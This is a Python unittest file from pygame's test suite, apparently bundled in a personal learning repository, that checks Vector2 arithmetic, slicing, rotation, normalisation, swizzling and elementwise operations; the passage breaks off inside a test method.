esserafael/PythonStuff
|
97900e48f989b64ccde02f5d676f7f823ec0eed7
|
[
"MIT"
] | 1
|
2021-08-23T20:43:21.000Z
|
2021-08-23T20:43:21.000Z
|
PyGame/.venv/Lib/site-packages/pygame/tests/math_test.py
|
esserafael/python-learning-stuff
|
97900e48f989b64ccde02f5d676f7f823ec0eed7
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import sys
import unittest
import math
import platform
import pygame.math
from pygame.math import Vector2, Vector3
IS_PYPY = 'PyPy' == platform.python_implementation()
PY3 = sys.version_info.major == 3
class Vector2TypeTest(unittest.TestCase):
def setUp(self):
pygame.math.enable_swizzling()
self.zeroVec = Vector2()
self.e1 = Vector2(1, 0)
self.e2 = Vector2(0, 1)
self.t1 = (1.2, 3.4)
self.l1 = list(self.t1)
self.v1 = Vector2(self.t1)
self.t2 = (5.6, 7.8)
self.l2 = list(self.t2)
self.v2 = Vector2(self.t2)
self.s1 = 5.6
self.s2 = 7.8
def tearDown(self):
pygame.math.enable_swizzling()
def testConstructionDefault(self):
v = Vector2()
self.assertEqual(v.x, 0.)
self.assertEqual(v.y, 0.)
def testConstructionScalar(self):
v = Vector2(1)
self.assertEqual(v.x, 1.)
self.assertEqual(v.y, 1.)
def testConstructionScalarKeywords(self):
v = Vector2(x=1)
self.assertEqual(v.x, 1.)
self.assertEqual(v.y, 1.)
def testConstructionKeywords(self):
v = Vector2(x=1, y=2)
self.assertEqual(v.x, 1.)
self.assertEqual(v.y, 2.)
def testConstructionXY(self):
v = Vector2(1.2, 3.4)
self.assertEqual(v.x, 1.2)
self.assertEqual(v.y, 3.4)
def testConstructionTuple(self):
v = Vector2((1.2, 3.4))
self.assertEqual(v.x, 1.2)
self.assertEqual(v.y, 3.4)
def testConstructionList(self):
v = Vector2([1.2, 3.4])
self.assertEqual(v.x, 1.2)
self.assertEqual(v.y, 3.4)
def testConstructionVector2(self):
v = Vector2(Vector2(1.2, 3.4))
self.assertEqual(v.x, 1.2)
self.assertEqual(v.y, 3.4)
def testAttributAccess(self):
tmp = self.v1.x
self.assertEqual(tmp, self.v1.x)
self.assertEqual(tmp, self.v1[0])
tmp = self.v1.y
self.assertEqual(tmp, self.v1.y)
self.assertEqual(tmp, self.v1[1])
self.v1.x = 3.141
self.assertEqual(self.v1.x, 3.141)
self.v1.y = 3.141
self.assertEqual(self.v1.y, 3.141)
def assign_nonfloat():
v = Vector2()
v.x = "spam"
self.assertRaises(TypeError, assign_nonfloat)
def testSequence(self):
v = Vector2(1.2, 3.4)
Vector2()[:]
self.assertEqual(len(v), 2)
self.assertEqual(v[0], 1.2)
self.assertEqual(v[1], 3.4)
self.assertRaises(IndexError, lambda : v[2])
self.assertEqual(v[-1], 3.4)
self.assertEqual(v[-2], 1.2)
self.assertRaises(IndexError, lambda : v[-3])
self.assertEqual(v[:], [1.2, 3.4])
self.assertEqual(v[1:], [3.4])
self.assertEqual(v[:1], [1.2])
self.assertEqual(list(v), [1.2, 3.4])
self.assertEqual(tuple(v), (1.2, 3.4))
v[0] = 5.6
v[1] = 7.8
self.assertEqual(v.x, 5.6)
self.assertEqual(v.y, 7.8)
v[:] = [9.1, 11.12]
self.assertEqual(v.x, 9.1)
self.assertEqual(v.y, 11.12)
def overpopulate():
v = Vector2()
v[:] = [1, 2, 3]
self.assertRaises(ValueError, overpopulate)
def underpopulate():
v = Vector2()
v[:] = [1]
self.assertRaises(ValueError, underpopulate)
def assign_nonfloat():
v = Vector2()
v[0] = "spam"
self.assertRaises(TypeError, assign_nonfloat)
def testExtendedSlicing(self):
# deletion
def delSlice(vec, start=None, stop=None, step=None):
if start is not None and stop is not None and step is not None:
del vec[start:stop:step]
elif start is not None and stop is None and step is not None:
del vec[start::step]
elif start is None and stop is None and step is not None:
del vec[::step]
v = Vector2(self.v1)
self.assertRaises(TypeError, delSlice, v, None, None, 2)
self.assertRaises(TypeError, delSlice, v, 1, None, 2)
self.assertRaises(TypeError, delSlice, v, 1, 2, 1)
# assignment
v = Vector2(self.v1)
v[::2] = [-1]
self.assertEqual(v, [-1, self.v1.y])
v = Vector2(self.v1)
v[::-2] = [10]
self.assertEqual(v, [self.v1.x, 10])
v = Vector2(self.v1)
v[::-1] = v
self.assertEqual(v, [self.v1.y, self.v1.x])
a = Vector2(self.v1)
b = Vector2(self.v1)
c = Vector2(self.v1)
a[1:2] = [2.2]
b[slice(1,2)] = [2.2]
c[1:2:] = (2.2,)
self.assertEqual(a, b)
self.assertEqual(a, c)
self.assertEqual(type(a), type(self.v1))
self.assertEqual(type(b), type(self.v1))
self.assertEqual(type(c), type(self.v1))
def testAdd(self):
v3 = self.v1 + self.v2
self.assertTrue(isinstance(v3, type(self.v1)))
self.assertEqual(v3.x, self.v1.x + self.v2.x)
self.assertEqual(v3.y, self.v1.y + self.v2.y)
v3 = self.v1 + self.t2
self.assertTrue(isinstance(v3, type(self.v1)))
self.assertEqual(v3.x, self.v1.x + self.t2[0])
self.assertEqual(v3.y, self.v1.y + self.t2[1])
v3 = self.v1 + self.l2
self.assertTrue(isinstance(v3, type(self.v1)))
self.assertEqual(v3.x, self.v1.x + self.l2[0])
self.assertEqual(v3.y, self.v1.y + self.l2[1])
v3 = self.t1 + self.v2
self.assertTrue(isinstance(v3, type(self.v1)))
self.assertEqual(v3.x, self.t1[0] + self.v2.x)
self.assertEqual(v3.y, self.t1[1] + self.v2.y)
v3 = self.l1 + self.v2
self.assertTrue(isinstance(v3, type(self.v1)))
self.assertEqual(v3.x, self.l1[0] + self.v2.x)
self.assertEqual(v3.y, self.l1[1] + self.v2.y)
def testSub(self):
v3 = self.v1 - self.v2
self.assertTrue(isinstance(v3, type(self.v1)))
self.assertEqual(v3.x, self.v1.x - self.v2.x)
self.assertEqual(v3.y, self.v1.y - self.v2.y)
v3 = self.v1 - self.t2
self.assertTrue(isinstance(v3, type(self.v1)))
self.assertEqual(v3.x, self.v1.x - self.t2[0])
self.assertEqual(v3.y, self.v1.y - self.t2[1])
v3 = self.v1 - self.l2
self.assertTrue(isinstance(v3, type(self.v1)))
self.assertEqual(v3.x, self.v1.x - self.l2[0])
self.assertEqual(v3.y, self.v1.y - self.l2[1])
v3 = self.t1 - self.v2
self.assertTrue(isinstance(v3, type(self.v1)))
self.assertEqual(v3.x, self.t1[0] - self.v2.x)
self.assertEqual(v3.y, self.t1[1] - self.v2.y)
v3 = self.l1 - self.v2
self.assertTrue(isinstance(v3, type(self.v1)))
self.assertEqual(v3.x, self.l1[0] - self.v2.x)
self.assertEqual(v3.y, self.l1[1] - self.v2.y)
def testScalarMultiplication(self):
v = self.s1 * self.v1
self.assertTrue(isinstance(v, type(self.v1)))
self.assertEqual(v.x, self.s1 * self.v1.x)
self.assertEqual(v.y, self.s1 * self.v1.y)
v = self.v1 * self.s2
self.assertEqual(v.x, self.v1.x * self.s2)
self.assertEqual(v.y, self.v1.y * self.s2)
def testScalarDivision(self):
v = self.v1 / self.s1
self.assertTrue(isinstance(v, type(self.v1)))
self.assertAlmostEqual(v.x, self.v1.x / self.s1)
self.assertAlmostEqual(v.y, self.v1.y / self.s1)
v = self.v1 // self.s2
self.assertTrue(isinstance(v, type(self.v1)))
self.assertEqual(v.x, self.v1.x // self.s2)
self.assertEqual(v.y, self.v1.y // self.s2)
def testBool(self):
self.assertEqual(bool(self.zeroVec), False)
self.assertEqual(bool(self.v1), True)
self.assertTrue(not self.zeroVec)
self.assertTrue(self.v1)
def testUnary(self):
v = +self.v1
self.assertTrue(isinstance(v, type(self.v1)))
self.assertEqual(v.x, self.v1.x)
self.assertEqual(v.y, self.v1.y)
self.assertNotEqual(id(v), id(self.v1))
v = -self.v1
self.assertTrue(isinstance(v, type(self.v1)))
self.assertEqual(v.x, -self.v1.x)
self.assertEqual(v.y, -self.v1.y)
self.assertNotEqual(id(v), id(self.v1))
def testCompare(self):
int_vec = Vector2(3, -2)
flt_vec = Vector2(3.0, -2.0)
zero_vec = Vector2(0, 0)
self.assertEqual(int_vec == flt_vec, True)
self.assertEqual(int_vec != flt_vec, False)
self.assertEqual(int_vec != zero_vec, True)
self.assertEqual(flt_vec == zero_vec, False)
self.assertEqual(int_vec == (3, -2), True)
self.assertEqual(int_vec != (3, -2), False)
self.assertEqual(int_vec != [0, 0], True)
self.assertEqual(int_vec == [0, 0], False)
self.assertEqual(int_vec != 5, True)
self.assertEqual(int_vec == 5, False)
self.assertEqual(int_vec != [3, -2, 0], True)
self.assertEqual(int_vec == [3, -2, 0], False)
def testStr(self):
v = Vector2(1.2, 3.4)
self.assertEqual(str(v), "[1.2, 3.4]")
def testRepr(self):
v = Vector2(1.2, 3.4)
self.assertEqual(v.__repr__(), "<Vector2(1.2, 3.4)>")
self.assertEqual(v, Vector2(v.__repr__()))
def testIter(self):
it = self.v1.__iter__()
if PY3:
next_ = it.__next__
else:
next_ = it.next
self.assertEqual(next_(), self.v1[0])
self.assertEqual(next_(), self.v1[1])
self.assertRaises(StopIteration, lambda : next_())
it1 = self.v1.__iter__()
it2 = self.v1.__iter__()
self.assertNotEqual(id(it1), id(it2))
self.assertEqual(id(it1), id(it1.__iter__()))
self.assertEqual(list(it1), list(it2));
self.assertEqual(list(self.v1.__iter__()), self.l1)
idx = 0
for val in self.v1:
self.assertEqual(val, self.v1[idx])
idx += 1
def test_rotate(self):
v1 = Vector2(1, 0)
v2 = v1.rotate(90)
v3 = v1.rotate(90 + 360)
self.assertEqual(v1.x, 1)
self.assertEqual(v1.y, 0)
self.assertEqual(v2.x, 0)
self.assertEqual(v2.y, 1)
self.assertEqual(v3.x, v2.x)
self.assertEqual(v3.y, v2.y)
v1 = Vector2(-1, -1)
v2 = v1.rotate(-90)
self.assertEqual(v2.x, -1)
self.assertEqual(v2.y, 1)
v2 = v1.rotate(360)
self.assertEqual(v1.x, v2.x)
self.assertEqual(v1.y, v2.y)
v2 = v1.rotate(0)
self.assertEqual(v1.x, v2.x)
self.assertEqual(v1.y, v2.y)
# issue 214
self.assertEqual(Vector2(0, 1).rotate(359.99999999), Vector2(0, 1))
def test_rotate_ip(self):
v = Vector2(1, 0)
self.assertEqual(v.rotate_ip(90), None)
self.assertEqual(v.x, 0)
self.assertEqual(v.y, 1)
v = Vector2(-1, -1)
v.rotate_ip(-90)
self.assertEqual(v.x, -1)
self.assertEqual(v.y, 1)
def test_normalize(self):
v = self.v1.normalize()
# length is 1
self.assertAlmostEqual(v.x * v.x + v.y * v.y, 1.)
# v1 is unchanged
self.assertEqual(self.v1.x, self.l1[0])
self.assertEqual(self.v1.y, self.l1[1])
# v2 is paralell to v1
self.assertAlmostEqual(self.v1.x * v.y - self.v1.y * v.x, 0.)
self.assertRaises(ValueError, lambda : self.zeroVec.normalize())
def test_normalize_ip(self):
v = +self.v1
# v has length != 1 before normalizing
self.assertNotEqual(v.x * v.x + v.y * v.y, 1.)
# inplace operations should return None
self.assertEqual(v.normalize_ip(), None)
# length is 1
self.assertAlmostEqual(v.x * v.x + v.y * v.y, 1.)
# v2 is paralell to v1
self.assertAlmostEqual(self.v1.x * v.y - self.v1.y * v.x, 0.)
self.assertRaises(ValueError, lambda : self.zeroVec.normalize_ip())
def test_is_normalized(self):
self.assertEqual(self.v1.is_normalized(), False)
v = self.v1.normalize()
self.assertEqual(v.is_normalized(), True)
self.assertEqual(self.e2.is_normalized(), True)
self.assertEqual(self.zeroVec.is_normalized(), False)
def test_cross(self):
self.assertEqual(self.v1.cross(self.v2),
self.v1.x * self.v2.y - self.v1.y * self.v2.x)
self.assertEqual(self.v1.cross(self.l2),
self.v1.x * self.l2[1] - self.v1.y * self.l2[0])
self.assertEqual(self.v1.cross(self.t2),
self.v1.x * self.t2[1] - self.v1.y * self.t2[0])
self.assertEqual(self.v1.cross(self.v2), -self.v2.cross(self.v1))
self.assertEqual(self.v1.cross(self.v1), 0)
def test_dot(self):
self.assertAlmostEqual(self.v1.dot(self.v2),
self.v1.x * self.v2.x + self.v1.y * self.v2.y)
self.assertAlmostEqual(self.v1.dot(self.l2),
self.v1.x * self.l2[0] + self.v1.y * self.l2[1])
self.assertAlmostEqual(self.v1.dot(self.t2),
self.v1.x * self.t2[0] + self.v1.y * self.t2[1])
self.assertEqual(self.v1.dot(self.v2), self.v2.dot(self.v1))
self.assertEqual(self.v1.dot(self.v2), self.v1 * self.v2)
def test_angle_to(self):
self.assertEqual(self.v1.rotate(self.v1.angle_to(self.v2)).normalize(),
self.v2.normalize())
self.assertEqual(Vector2(1, 1).angle_to((-1, 1)), 90)
self.assertEqual(Vector2(1, 0).angle_to((0, -1)), -90)
self.assertEqual(Vector2(1, 0).angle_to((-1, 1)), 135)
self.assertEqual(abs(Vector2(1, 0).angle_to((-1, 0))), 180)
def test_scale_to_length(self):
v = Vector2(1, 1)
v.scale_to_length(2.5)
self.assertEqual(v, Vector2(2.5, 2.5) / math.sqrt(2))
self.assertRaises(ValueError, lambda : self.zeroVec.scale_to_length(1))
self.assertEqual(v.scale_to_length(0), None)
self.assertEqual(v, self.zeroVec)
def test_length(self):
self.assertEqual(Vector2(3, 4).length(), 5)
self.assertEqual(Vector2(-3, 4).length(), 5)
self.assertEqual(self.zeroVec.length(), 0)
def test_length_squared(self):
self.assertEqual(Vector2(3, 4).length_squared(), 25)
self.assertEqual(Vector2(-3, 4).length_squared(), 25)
self.assertEqual(self.zeroVec.length_squared(), 0)
def test_reflect(self):
v = Vector2(1, -1)
n = Vector2(0, 1)
self.assertEqual(v.reflect(n), Vector2(1, 1))
self.assertEqual(v.reflect(3*n), v.reflect(n))
self.assertEqual(v.reflect(-v), -v)
self.assertRaises(ValueError, lambda : v.reflect(self.zeroVec))
def test_reflect_ip(self):
v1 = Vector2(1, -1)
v2 = Vector2(v1)
n = Vector2(0, 1)
self.assertEqual(v2.reflect_ip(n), None)
self.assertEqual(v2, Vector2(1, 1))
v2 = Vector2(v1)
v2.reflect_ip(3*n)
self.assertEqual(v2, v1.reflect(n))
v2 = Vector2(v1)
v2.reflect_ip(-v1)
self.assertEqual(v2, -v1)
self.assertRaises(ValueError, lambda : v2.reflect_ip(Vector2()))
def test_distance_to(self):
diff = self.v1 - self.v2
self.assertEqual(self.e1.distance_to(self.e2), math.sqrt(2))
self.assertAlmostEqual(self.v1.distance_to(self.v2),
math.sqrt(diff.x * diff.x + diff.y * diff.y))
self.assertEqual(self.v1.distance_to(self.v1), 0)
self.assertEqual(self.v1.distance_to(self.v2),
self.v2.distance_to(self.v1))
def test_distance_squared_to(self):
diff = self.v1 - self.v2
self.assertEqual(self.e1.distance_squared_to(self.e2), 2)
self.assertAlmostEqual(self.v1.distance_squared_to(self.v2),
diff.x * diff.x + diff.y * diff.y)
self.assertEqual(self.v1.distance_squared_to(self.v1), 0)
self.assertEqual(self.v1.distance_squared_to(self.v2),
self.v2.distance_squared_to(self.v1))
def test_update(self):
v = Vector2(3, 4)
v.update(0)
self.assertEqual(v, Vector2((0, 0)))
v.update(5, 1)
self.assertEqual(v, Vector2(5, 1))
v.update((4, 1))
self.assertNotEqual(v, Vector2((5, 1)))
def test_swizzle(self):
self.assertTrue(hasattr(pygame.math, "enable_swizzling"))
self.assertTrue(hasattr(pygame.math, "disable_swizzling"))
# swizzling not disabled by default
pygame.math.disable_swizzling()
self.assertRaises(AttributeError, lambda : self.v1.yx)
pygame.math.enable_swizzling()
self.assertEqual(self.v1.yx, (self.v1.y, self.v1.x))
self.assertEqual(self.v1.xxyyxy, (self.v1.x, self.v1.x, self.v1.y,
self.v1.y, self.v1.x, self.v1.y))
self.v1.xy = self.t2
self.assertEqual(self.v1, self.t2)
self.v1.yx = self.t2
self.assertEqual(self.v1, (self.t2[1], self.t2[0]))
self.assertEqual(type(self.v1), Vector2)
def invalidSwizzleX():
Vector2().xx = (1, 2)
def invalidSwizzleY():
Vector2().yy = (1, 2)
self.assertRaises(AttributeError, invalidSwizzleX)
self.assertRaises(AttributeError, invalidSwizzleY)
def invalidAssignment():
Vector2().xy = 3
self.assertRaises(TypeError, invalidAssignment)
def unicodeAttribute():
getattr(Vector2(), "ä")
self.assertRaises(AttributeError, unicodeAttribute)
def test_swizzle_return_types(self):
self.assertEqual(type(self.v1.x), float)
self.assertEqual(type(self.v1.xy), Vector2)
self.assertEqual(type(self.v1.xyx), Vector3)
# but we don't have vector4 or above... so tuple.
self.assertEqual(type(self.v1.xyxy), tuple)
self.assertEqual(type(self.v1.xyxyx), tuple)
def test_elementwise(self):
# behaviour for "elementwise op scalar"
self.assertEqual(self.v1.elementwise() + self.s1,
(self.v1.x + self.s1, self.v1.y + self.s1))
self.assertEqual(self.v1.elementwise() - self.s1,
(self.v1.x - self.s1, self.v1.y - self.s1))
self.assertEqual(self.v1.elementwise() * self.s2,
(self.v1.x * self.s2, self.v1.y * self.s2))
self.assertEqual(self.v1.elementwise() / self.s2,
(self.v1.x / self.s2, self.v1.y / self.s2))
self.assertEqual(self.v1.elementwise() // self.s1,
(self.v1.x // self.s1, self.v1.y // self.s1))
self.assertEqual(self.v1.elementwise() ** self.s1,
(self.v1.x ** self.s1, self.v1.y ** self.s1))
self.assertEqual(self.v1.elementwise() % self.s1,
(self.v1.x % self.s1, self.v1.y % self.s1))
self.assertEqual(self.v1.elementwise() > self.s1,
self.v1.x > self.s1 and self.v1.y > self.s1)
self.assertEqual(self.v1.elementwise() < self.s1,
self.v1.x < self.s1 and self.v1.y < self.s1)
self.assertEqual(self.v1.elementwise() == self.s1,
self.v1.x == self.s1 and self.v1.y == self.s1)
self.assertEqual(self.v1.elementwise() != self.s1,
self.v1.x != self.s1 and self.v1.y != self.s1)
self.assertEqual(self.v1.elementwise() >= self.s1,
self.v1.x >= self.s1 and self.v1.y >= self.s1)
self.assertEqual(self.v1.elementwise() <= self.s1,
self.v1.x <= self.s1 and self.v1.y <= self.s1)
self.assertEqual(self.v1.elementwise() != self.s1,
self.v1.x != self.s1 and self.v1.y != self.s1)
# behaviour for "scalar op elementwise"
self.assertEqual(5 + self.v1.elementwise(), Vector2(5, 5) + self.v1)
self.assertEqual(3.5 - self.v1.elementwise(), Vector2(3.5, 3.5) - self.v1)
self.assertEqual(7.5 * self.v1.elementwise() , 7.5 * self.v1)
self.assertEqual(-3.5 / self.v1.elementwise(), (-3.5 / self.v1.x, -3.5 / self.v1.y))
self.assertEqual(-3.5 // self.v1.elementwise(), (-3.5 // self.v1.x, -3.5 // self.v1.y))
self.assertEqual(-3.5 ** self.v1.elementwise(), (-3.5 ** self.v1.x, -3.5 ** self.v1.y))
self.assertEqual(3 % self.v1.elementwise(), (3 % self.v1.x, 3 % self.v1.y))
self.assertEqual(2 < self.v1.elementwise(), 2 < self.v1.x and 2 < self.v1.y)
self.assertEqual(2 > self.v1.elementwise(), 2 > self.v1.x and 2 > self.v1.y)
self.assertEqual(1 == self.v1.elementwise(), 1 == self.v1.x and 1 == self.v1.y)
self.assertEqual(1 != self.v1.elementwise(), 1 != self.v1.x and 1 != self.v1.y)
self.assertEqual(2 <= self.v1.elementwise(), 2 <= self.v1.x and 2 <= self.v1.y)
self.assertEqual(-7 >= self.v1.elementwise(), -7 >= self.v1.x and -7 >= self.v1.y)
self.assertEqual(-7 != self.v1.elementwise(), -7 != self.v1.x and -7 != self.v1.y)
# behaviour for "elementwise op vector"
self.assertEqual(type(self.v1.elementwise() * self.v2), type(self.v1))
self.assertEqual(self.v1.elementwise() + self.v2, self.v1 + self.v2)
self.assertEqual(self.v1.elementwise() + self.v2, self.v1 + self.v2)
self.assertEqual(self.v1.elementwise() - self.v2, self.v1 - self.v2)
self.assertEqual(self.v1.elementwise() * self.v2, (self.v1.x * self.v2.x, self.v1.y * self.v2.y))
self.assertEqual(self.v1.elementwise() / self.v2, (self.v1.x / self.v2.x, self.v1.y / self.v2.y))
self.assertEqual(self.v1.elementwise() // self.v2, (self.v1.x // self.v2.x, self.v1.y // self.v2.y))
self.assertEqual(self.v1.elementwise() ** self.v2, (self.v1.x ** self.v2.x, self.v1.y ** self.v2.y))
self.assertEqual(self.v1.elementwise() % self.v2, (self.v1.x % self.v2.x, self.v1.y % self.v2.y))
self.assertEqual(self.v1.elementwise() > self.v2, self.v1.x > self.v2.x and self.v1.y > self.v2.y)
self.assertEqual(self.v1.elementwise() < self.v2, self.v1.x < self.v2.x and self.v1.y < self.v2.y)
self.assertEqual(self.v1.elementwise() >= self.v2, self.v1.x >= self.v2.x and self.v1.y >= self.v2.y)
self.assertEqual(self.v1.elementwise() <= self.v2, self.v1.x <= self.v2.x and self.v1.y <= self.v2.y)
self.assertEqual(self.v1.elementwise() == self.v2, self.v1.x == self.v2.x and self.v1.y == self.v2.y)
self.assertEqual(self.v1.elementwise() != self.v2, self.v1.x != self.v2.x and self.v1.y != self.v2.y)
# behaviour for "vector op elementwise"
self.assertEqual(self.v2 + self.v1.elementwise(), self.v2 + self.v1)
self.assertEqual(self.v2 - self.v1.elementwise(), self.v2 - self.v1)
self.assertEqual(self.v2 * self.v1.elementwise(), (self.v2.x * self.v1.x, self.v2.y * self.v1.y))
self.assertEqual(self.v2 / self.v1.elementwise(), (self.v2.x / self.v1.x, self.v2.y / self.v1.y))
self.assertEqual(self.v2 // self.v1.elementwise(), (self.v2.x // self.v1.x, self.v2.y // self.v1.y))
self.assertEqual(self.v2 ** self.v1.elementwise(), (self.v2.x ** self.v1.x, self.v2.y ** self.v1.y))
self.assertEqual(self.v2 % self.v1.elementwise(), (self.v2.x % self.v1.x, self.v2.y % self.v1.y))
self.assertEqual(self.v2 < self.v1.elementwise(), self.v2.x < self.v1.x and self.v2.y < self.v1.y)
self.assertEqual(self.v2 > self.v1.elementwise(), self.v2.x > self.v1.x and self.v2.y > self.v1.y)
self.assertEqual(self.v2 <= self.v1.elementwise(), self.v2.x <= self.v1.x and self.v2.y <= self.v1.y)
self.assertEqual(self.v2 >= self.v1.elementwise(), self.v2.x >= self.v1.x and self.v2.y >= self.v1.y)
self.assertEqual(self.v2 == self.v1.elementwise(), self.v2.x == self.v1.x and self.v2.y == self.v1.y)
self.assertEqual(self.v2 != self.v1.elementwise(), self.v2.x != self.v1.x and self.v2.y != self.v1.y)
# behaviour for "elementwise op elementwise"
self.assertEqual(self.v2.elementwise() + self.v1.elementwise(), self.v2 + self.v1)
self.assertEqual(self.v2.elementwise() - self.v1.elementwise(), self.v2 - self.v1)
self.assertEqual(self.v2.elementwise() * self.v1.elementwise(), (self.v2.x * self.v1.x, self.v2.y * self.v1.y))
self.assertEqual(self.v2.elementwise() / self.v1.elementwise(), (self.v2.x / self.v1.x, self.v2.y / self.v1.y))
self.assertEqual(self.v2.elementwise() // self.v1.elementwise(), (self.v2.x // self.v1.x, self.v2.y // self.v1.y))
self.assertEqual(self.v2.elementwise() ** self.v1.elementwise(), (self.v2.x ** self.v1.x, self.v2.y ** self.v1.y))
self.assertEqual(self.v2.elementwise() % self.v1.elementwise(), (self.v2.x % self.v1.x, self.v2.y % self.v1.y))
self.assertEqual(self.v2.elementwise() < self.v1.elementwise(), self.v2.x < self.v1.x and self.v2.y < self.v1.y)
self.assertEqual(self.v2.elementwise() > self.v1.elementwise(), self.v2.x > self.v1.x and self.v2.y > self.v1.y)
self.assertEqual(self.v2.elementwise() <= self.v1.elementwise(), self.v2.x <= self.v1.x and self.v2.y <= self.v1.y)
self.assertEqual(self.v2.elementwise() >= self.v1.elementwise(), self.v2.x >= self.v1.x and self.v2.y >= self.v1.y)
self.assertEqual(self.v2.elementwise() == self.v1.elementwise(), self.v2.x == self.v1.x and self.v2.y == self.v1.y)
self.assertEqual(self.v2.elementwise() != self.v1.elementwise(), self.v2.x != self.v1.x and self.v2.y != self.v1.y)
# other behaviour
self.assertEqual(abs(self.v1.elementwise()), (abs(self.v1.x), abs(self.v1.y)))
self.assertEqual(-self.v1.elementwise(), -self.v1)
self.assertEqual(+self.v1.elementwise(), +self.v1)
self.assertEqual(bool(self.v1.elementwise()), bool(self.v1))
self.assertEqual(bool(Vector2().elementwise()), bool(Vector2()))
self.assertEqual(self.zeroVec.elementwise() ** 0, (1, 1))
self.assertRaises(ValueError, lambda : pow(Vector2(-1, 0).elementwise(), 1.2))
self.assertRaises(ZeroDivisionError, lambda : self.zeroVec.elementwise() ** -1)
def test_elementwise(self):
v1 = self.v1
v2 = self.v2
s1 = self.s1
s2 = self.s2
# behaviour for "elementwise op scalar"
self.assertEqual(v1.elementwise() + s1, (v1.x + s1, v1.y + s1))
self.assertEqual(v1.elementwise() - s1, (v1.x - s1, v1.y - s1))
self.assertEqual(v1.elementwise() * s2, (v1.x * s2, v1.y * s2))
self.assertEqual(v1.elementwise() / s2, (v1.x / s2, v1.y / s2))
self.assertEqual(v1.elementwise() // s1, (v1.x // s1, v1.y // s1))
self.assertEqual(v1.elementwise() ** s1, (v1.x ** s1, v1.y ** s1))
self.assertEqual(v1.elementwise() % s1, (v1.x % s1, v1.y % s1))
self.assertEqual(v1.elementwise() > s1, v1.x > s1 and v1.y > s1)
self.assertEqual(v1.elementwise() < s1, v1.x < s1 and v1.y < s1)
self.assertEqual(v1.elementwise() == s1, v1.x == s1 and v1.y == s1)
self.assertEqual(v1.elementwise() != s1, v1.x != s1 and v1.y != s1)
self.assertEqual(v1.elementwise() >= s1, v1.x >= s1 and v1.y >= s1)
self.assertEqual(v1.elementwise() <= s1, v1.x <= s1 and v1.y <= s1)
self.assertEqual(v1.elementwise() != s1, v1.x != s1 and v1.y != s1)
# behaviour for "scalar op elementwise"
self.assertEqual(s1 + v1.elementwise(), (s1 + v1.x, s1 + v1.y))
self.assertEqual(s1 - v1.elementwise(), (s1 - v1.x, s1 - v1.y))
self.assertEqual(s1 * v1.elementwise(), (s1 * v1.x, s1 * v1.y))
self.assertEqual(s1 / v1.elementwise(), (s1 / v1.x, s1 / v1.y))
self.assertEqual(s1 // v1.elementwise(), (s1 // v1.x, s1 // v1.y))
self.assertEqual(s1 ** v1.elementwise(), (s1 ** v1.x, s1 ** v1.y))
self.assertEqual(s1 % v1.elementwise(), (s1 % v1.x, s1 % v1.y))
self.assertEqual(s1 < v1.elementwise(), s1 < v1.x and s1 < v1.y)
self.assertEqual(s1 > v1.elementwise(), s1 > v1.x and s1 > v1.y)
self.assertEqual(s1 == v1.elementwise(), s1 == v1.x and s1 == v1.y)
self.assertEqual(s1 != v1.elementwise(), s1 != v1.x and s1 != v1.y)
self.assertEqual(s1 <= v1.elementwise(), s1 <= v1.x and s1 <= v1.y)
self.assertEqual(s1 >= v1.elementwise(), s1 >= v1.x and s1 >= v1.y)
self.assertEqual(s1 != v1.elementwise(), s1 != v1.x and s1 != v1.y)
# behaviour for "elementwise op vector"
self.assertEqual(type(v1.elementwise() * v2), type(v1))
self.assertEqual(v1.elementwise() + v2, v1 + v2)
self.assertEqual(v1.elementwise() - v2, v1 - v2)
self.assertEqual(v1.elementwise() * v2, (v1.x * v2.x, v1.y * v2.y))
self.assertEqual(v1.elementwise() / v2, (v1.x / v2.x, v1.y / v2.y))
self.assertEqual(v1.elementwise() // v2, (v1.x // v2.x, v1.y // v2.y))
self.assertEqual(v1.elementwise() ** v2, (v1.x ** v2.x, v1.y ** v2.y))
self.assertEqual(v1.elementwise() % v2, (v1.x % v2.x, v1.y % v2.y))
self.assertEqual(v1.elementwise() > v2, v1.x > v2.x and v1.y > v2.y)
self.assertEqual(v1.elementwise() < v2, v1.x < v2.x and v1.y < v2.y)
self.assertEqual(v1.elementwise() >= v2, v1.x >= v2.x and v1.y >= v2.y)
self.assertEqual(v1.elementwise() <= v2, v1.x <= v2.x and v1.y <= v2.y)
self.assertEqual(v1.elementwise() == v2, v1.x == v2.x and v1.y == v2.y)
self.assertEqual(v1.elementwise() != v2, v1.x != v2.x and v1.y != v2.y)
# behaviour for "vector op elementwise"
self.assertEqual(v2 + v1.elementwise(), v2 + v1)
self.assertEqual(v2 - v1.elementwise(), v2 - v1)
self.assertEqual(v2 * v1.elementwise(), (v2.x * v1.x, v2.y * v1.y))
self.assertEqual(v2 / v1.elementwise(), (v2.x / v1.x, v2.y / v1.y))
self.assertEqual(v2 // v1.elementwise(), (v2.x // v1.x, v2.y // v1.y))
self.assertEqual(v2 ** v1.elementwise(), (v2.x ** v1.x, v2.y ** v1.y))
self.assertEqual(v2 % v1.elementwise(), (v2.x % v1.x, v2.y % v1.y))
self.assertEqual(v2 < v1.elementwise(), v2.x < v1.x and v2.y < v1.y)
self.assertEqual(v2 > v1.elementwise(), v2.x > v1.x and v2.y > v1.y)
self.assertEqual(v2 <= v1.elementwise(), v2.x <= v1.x and v2.y <= v1.y)
self.assertEqual(v2 >= v1.elementwise(), v2.x >= v1.x and v2.y >= v1.y)
self.assertEqual(v2 == v1.elementwise(), v2.x == v1.x and v2.y == v1.y)
self.assertEqual(v2 != v1.elementwise(), v2.x != v1.x and v2.y != v1.y)
# behaviour for "elementwise op elementwise"
self.assertEqual(v2.elementwise() + v1.elementwise(), v2 + v1)
self.assertEqual(v2.elementwise() - v1.elementwise(), v2 - v1)
self.assertEqual(v2.elementwise() * v1.elementwise(), (v2.x * v1.x, v2.y * v1.y))
self.assertEqual(v2.elementwise() / v1.elementwise(), (v2.x / v1.x, v2.y / v1.y))
self.assertEqual(v2.elementwise() // v1.elementwise(), (v2.x // v1.x, v2.y // v1.y))
self.assertEqual(v2.elementwise() ** v1.elementwise(), (v2.x ** v1.x, v2.y ** v1.y))
self.assertEqual(v2.elementwise() % v1.elementwise(), (v2.x % v1.x, v2.y % v1.y))
self.assertEqual(v2.elementwise() < v1.elementwise(), v2.x < v1.x and v2.y < v1.y)
self.assertEqual(v2.elementwise() > v1.elementwise(), v2.x > v1.x and v2.y > v1.y)
self.assertEqual(v2.elementwise() <= v1.elementwise(), v2.x <= v1.x and v2.y <= v1.y)
